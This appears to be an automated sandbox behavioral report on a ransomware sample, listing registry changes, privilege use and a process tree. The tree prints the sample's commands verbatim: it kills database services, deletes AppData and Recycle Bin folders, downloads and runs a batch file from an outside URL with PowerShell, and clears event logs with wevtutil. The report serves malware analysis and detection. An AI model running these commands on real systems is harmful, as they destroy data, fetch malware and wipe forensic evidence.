Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "359"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "56"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState\EdpCleanupState = "0"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana\ = "0"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\NumberOfSubdomains = "1"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.cortana\ = "0"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "0"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "0"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "359"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState\EdpState = "0"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "0"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "364"	SearchUI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\NumberOfSubdomains = "0"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana\Total = "0"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "23"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "56"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "359"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\ = "0"	SearchUI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchUI.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\ShellRefresh\1	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CacheLimit = "1"	SearchUI.exe

Opens file in notepad (likely ransom note) 2 IoCs
ransomware

Processes:

pid process

800
4252
Runs net.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

1344 powershell.exe
1344 powershell.exe
1344 powershell.exe

pid	process
800
4252

pid	process
1344	powershell.exe
1344	powershell.exe
1344	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

description	pid	process
Token: SeDebugPrivilege	3564	taskkill.exe
Token: SeDebugPrivilege	732	taskkill.exe
Token: SeDebugPrivilege	2316	taskkill.exe
Token: SeDebugPrivilege	2468	taskkill.exe
Token: SeDebugPrivilege	1344	powershell.exe
Token: SeSecurityPrivilege	2880	wevtutil.exe
Token: SeBackupPrivilege	2880	wevtutil.exe
Token: SeSecurityPrivilege	2448	wevtutil.exe
Token: SeBackupPrivilege	2448	wevtutil.exe
Token: SeSecurityPrivilege	2844	wevtutil.exe
Token: SeBackupPrivilege	2844	wevtutil.exe
Token: SeSecurityPrivilege	3264	wevtutil.exe
Token: SeBackupPrivilege	3264	wevtutil.exe
Token: SeSecurityPrivilege	492	wevtutil.exe
Token: SeBackupPrivilege	492	wevtutil.exe
Token: SeSecurityPrivilege	4076	wevtutil.exe
Token: SeBackupPrivilege	4076	wevtutil.exe
Token: SeSecurityPrivilege	3132	wevtutil.exe
Token: SeBackupPrivilege	3132	wevtutil.exe
Token: SeSecurityPrivilege	1908	wevtutil.exe
Token: SeBackupPrivilege	1908	wevtutil.exe
Token: SeSecurityPrivilege	680	wevtutil.exe
Token: SeBackupPrivilege	680	wevtutil.exe
Token: SeSecurityPrivilege	516	wevtutil.exe
Token: SeBackupPrivilege	516	wevtutil.exe
Token: SeSecurityPrivilege	3776	wevtutil.exe
Token: SeBackupPrivilege	3776	wevtutil.exe
Token: SeSecurityPrivilege	480	wevtutil.exe
Token: SeBackupPrivilege	480	wevtutil.exe
Token: SeSecurityPrivilege	3128	wevtutil.exe
Token: SeBackupPrivilege	3128	wevtutil.exe
Token: SeSecurityPrivilege	1308	wevtutil.exe
Token: SeBackupPrivilege	1308	wevtutil.exe
Token: SeSecurityPrivilege	1744	wevtutil.exe
Token: SeBackupPrivilege	1744	wevtutil.exe
Token: SeSecurityPrivilege	2424	wevtutil.exe
Token: SeBackupPrivilege	2424	wevtutil.exe
Token: SeSecurityPrivilege	2436	wevtutil.exe
Token: SeBackupPrivilege	2436	wevtutil.exe
Token: SeSecurityPrivilege	2892	wevtutil.exe
Token: SeBackupPrivilege	2892	wevtutil.exe
Token: SeSecurityPrivilege	2456	wevtutil.exe
Token: SeBackupPrivilege	2456	wevtutil.exe
Token: SeSecurityPrivilege	2448	wevtutil.exe
Token: SeBackupPrivilege	2448	wevtutil.exe
Token: SeSecurityPrivilege	2844	wevtutil.exe
Token: SeBackupPrivilege	2844	wevtutil.exe
Token: SeSecurityPrivilege	3264	wevtutil.exe
Token: SeBackupPrivilege	3264	wevtutil.exe
Token: SeSecurityPrivilege	492	wevtutil.exe
Token: SeBackupPrivilege	492	wevtutil.exe
Token: SeSecurityPrivilege	4076	wevtutil.exe
Token: SeBackupPrivilege	4076	wevtutil.exe
Token: SeSecurityPrivilege	64	wevtutil.exe
Token: SeBackupPrivilege	64	wevtutil.exe
Token: SeSecurityPrivilege	1908	wevtutil.exe
Token: SeBackupPrivilege	1908	wevtutil.exe
Token: SeSecurityPrivilege	680	wevtutil.exe
Token: SeBackupPrivilege	680	wevtutil.exe
Token: SeSecurityPrivilege	516	wevtutil.exe
Token: SeBackupPrivilege	516	wevtutil.exe
Token: SeSecurityPrivilege	4088	wevtutil.exe
Token: SeBackupPrivilege	4088	wevtutil.exe
Token: SeSecurityPrivilege	184	wevtutil.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

SearchUI.exe

pid process

496 SearchUI.exe
496 SearchUI.exe
496 SearchUI.exe
496 SearchUI.exe
496 SearchUI.exe

pid	process
496	SearchUI.exe
496	SearchUI.exe
496	SearchUI.exe
496	SearchUI.exe
496	SearchUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exe

description	pid	process	target process
PID 4024 wrote to memory of 516	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 4024 wrote to memory of 516	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 516 wrote to memory of 500	516	cmd.exe	reg.exe
PID 516 wrote to memory of 500	516	cmd.exe	reg.exe
PID 4024 wrote to memory of 204	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 4024 wrote to memory of 204	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 204 wrote to memory of 3564	204	cmd.exe	taskkill.exe
PID 204 wrote to memory of 3564	204	cmd.exe	taskkill.exe
PID 4024 wrote to memory of 756	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 4024 wrote to memory of 756	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 756 wrote to memory of 732	756	cmd.exe	taskkill.exe
PID 756 wrote to memory of 732	756	cmd.exe	taskkill.exe
PID 4024 wrote to memory of 1516	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 4024 wrote to memory of 1516	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 1516 wrote to memory of 2316	1516	cmd.exe	taskkill.exe
PID 1516 wrote to memory of 2316	1516	cmd.exe	taskkill.exe
PID 4024 wrote to memory of 2460	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 4024 wrote to memory of 2460	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 2460 wrote to memory of 2468	2460	cmd.exe	taskkill.exe
PID 2460 wrote to memory of 2468	2460	cmd.exe	taskkill.exe
PID 4024 wrote to memory of 2984	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 4024 wrote to memory of 2984	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 4024 wrote to memory of 360	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 4024 wrote to memory of 360	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 4024 wrote to memory of 3116	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 4024 wrote to memory of 3116	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 4024 wrote to memory of 2144	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 4024 wrote to memory of 2144	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 2144 wrote to memory of 2124	2144	cmd.exe	attrib.exe
PID 2144 wrote to memory of 2124	2144	cmd.exe	attrib.exe
PID 4024 wrote to memory of 2304	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 4024 wrote to memory of 2304	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 2304 wrote to memory of 1756	2304	cmd.exe	net.exe
PID 2304 wrote to memory of 1756	2304	cmd.exe	net.exe
PID 1756 wrote to memory of 580	1756	net.exe	net1.exe
PID 1756 wrote to memory of 580	1756	net.exe	net1.exe
PID 4024 wrote to memory of 4008	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 4024 wrote to memory of 4008	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 4008 wrote to memory of 3292	4008	cmd.exe	net.exe
PID 4008 wrote to memory of 3292	4008	cmd.exe	net.exe
PID 3292 wrote to memory of 3564	3292	net.exe	net1.exe
PID 3292 wrote to memory of 3564	3292	net.exe	net1.exe
PID 4024 wrote to memory of 1028	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 4024 wrote to memory of 1028	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 1028 wrote to memory of 1160	1028	cmd.exe	net.exe
PID 1028 wrote to memory of 1160	1028	cmd.exe	net.exe
PID 1160 wrote to memory of 1008	1160	net.exe	net1.exe
PID 1160 wrote to memory of 1008	1160	net.exe	net1.exe
PID 4024 wrote to memory of 2348	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 4024 wrote to memory of 2348	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 2348 wrote to memory of 2412	2348	cmd.exe	net.exe
PID 2348 wrote to memory of 2412	2348	cmd.exe	net.exe
PID 2412 wrote to memory of 2164	2412	net.exe	net1.exe
PID 2412 wrote to memory of 2164	2412	net.exe	net1.exe
PID 4024 wrote to memory of 1860	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 4024 wrote to memory of 1860	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 1860 wrote to memory of 2892	1860	cmd.exe	net.exe
PID 1860 wrote to memory of 2892	1860	cmd.exe	net.exe
PID 2892 wrote to memory of 2468	2892	net.exe	net1.exe
PID 2892 wrote to memory of 2468	2892	net.exe	net1.exe
PID 4024 wrote to memory of 3656	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 4024 wrote to memory of 3656	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 4024 wrote to memory of 2984	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe
PID 4024 wrote to memory of 2984	4024	39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe	cmd.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

2124 attrib.exe

pid	process
2124	attrib.exe

C:\Users\Admin\AppData\Local\Temp\39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe
"C:\Users\Admin\AppData\Local\Temp\39908c43e4124d6fd3362a5cf04cfbc4ac601ee35faf84a21c7979fdf74f05a6.exe"
1⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4024
- C:\Windows\system32\cmd.exe
  cmd /C "reg add HKEY_CLASSES_ROOT\.Encrypt\DefaultIcon /t REG_SZ /d %SystemRoot%\System32\SHELL32.dll,134 /f"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:516
- - C:\Windows\system32\reg.exe
    reg add HKEY_CLASSES_ROOT\.Encrypt\DefaultIcon /t REG_SZ /d C:\Windows\System32\SHELL32.dll,134 /f
    3⤵
    - Modifies registry class
    PID:500
- C:\Windows\system32\cmd.exe
  cmd /C "taskkill /F /IM sqlservr.exe /T"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:204
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM sqlservr.exe /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3564
- C:\Windows\system32\cmd.exe
  cmd /C "taskkill /F /IM sqlceip.exe /T"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:756
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM sqlceip.exe /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:732
- C:\Windows\system32\cmd.exe
  cmd /C "taskkill /F /IM sqlwriter.exe /T"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1516
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM sqlwriter.exe /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2316
- C:\Windows\system32\cmd.exe
  cmd /C "taskkill /F /IM Spoof.uxe.tmp /T"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2460
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM Spoof.uxe.tmp /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2468
- C:\Windows\system32\cmd.exe
  cmd /C "rmdir C:\Users\Admin\AppData /s /q"
  2⤵
  PID:2984
- C:\Windows\system32\cmd.exe
  cmd /C "rmdir C:\Users\Default\AppData /s /q"
  2⤵
  PID:360
- C:\Windows\system32\cmd.exe
  cmd /C "rmdir C:\Users\Public\AppData /s /q"
  2⤵
  PID:3116
- C:\Windows\system32\cmd.exe
  cmd /C "attrib +h +s Encrypt.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2144
- - C:\Windows\system32\attrib.exe
    attrib +h +s Encrypt.exe
    3⤵
    - Views/modifies file attributes
    PID:2124
- C:\Windows\system32\cmd.exe
  cmd /C "net stop MSSQL$SQLEXPRESS"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2304
- - C:\Windows\system32\net.exe
    net stop MSSQL$SQLEXPRESS
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1756
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS
      4⤵
      PID:580
- C:\Windows\system32\cmd.exe
  cmd /C "NET stop MSSQLSERVER"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4008
- - C:\Windows\system32\net.exe
    NET stop MSSQLSERVER
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3292
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQLSERVER
      4⤵
      PID:3564
- C:\Windows\system32\cmd.exe
  cmd /C "net stop SQLSERVERAGENT"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1028
- - C:\Windows\system32\net.exe
    net stop SQLSERVERAGENT
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1160
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLSERVERAGENT
      4⤵
      PID:1008
- C:\Windows\system32\cmd.exe
  cmd /C "net stop mysql"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2348
- - C:\Windows\system32\net.exe
    net stop mysql
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2412
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mysql
      4⤵
      PID:2164
- C:\Windows\system32\cmd.exe
  cmd /C "net stop plesksrv"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1860
- - C:\Windows\system32\net.exe
    net stop plesksrv
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2892
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop plesksrv
      4⤵
      PID:2468
- C:\Windows\system32\cmd.exe
  cmd /C "rmdir C:\$Recycle.Bin /s /q"
  2⤵
  PID:3656
- C:\Windows\system32\cmd.exe
  cmd /C "C:\windows\syswow64\windowspowershell\v1.0\powershell(New-Object System.Net.WebClient).DownloadFile('https://moonlightkrippe.ch/DesktopModules/Journal/clear.txt', 'C:\LOG.bat')"
  2⤵
  PID:2984
- - C:\windows\syswow64\windowspowershell\v1.0\powershell.exe
    C:\windows\syswow64\windowspowershell\v1.0\powershell (New-Object System.Net.WebClient).DownloadFile('https://moonlightkrippe.ch/DesktopModules/Journal/clear.txt', 'C:\LOG.bat')
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1344
- C:\Windows\system32\cmd.exe
  cmd /C C:\LOG.bat
  2⤵
  PID:2452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c bcdedit
    3⤵
    PID:2164
  - - C:\Windows\system32\bcdedit.exe
      bcdedit
      4⤵
      PID:2412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wevtutil.exe el
    3⤵
    PID:2456
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe el
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "AirSpaceChannel"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2448
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Analytic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2844
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Application"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3264
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "DirectShowFilterGraph"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:492
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "DirectShowPluginControl"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Els_Hyphenation/Analytic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3132
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "EndpointMapper"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1908
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "FirstUXPerf-Analytic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:680
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "ForwardedEvents"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "General Logging"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3776
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "HardwareEvents"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:480
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "IHM_DebugChannel"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3128
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1308
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1744
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2424
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2436
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2892
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2456
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Internet Explorer"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2448
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Key Management Service"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2844
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3264
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MedaFoundationVideoProc"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:492
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MedaFoundationVideoProcD3D"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationAsyncWrapper"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:64
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationContentProtection"
    3⤵
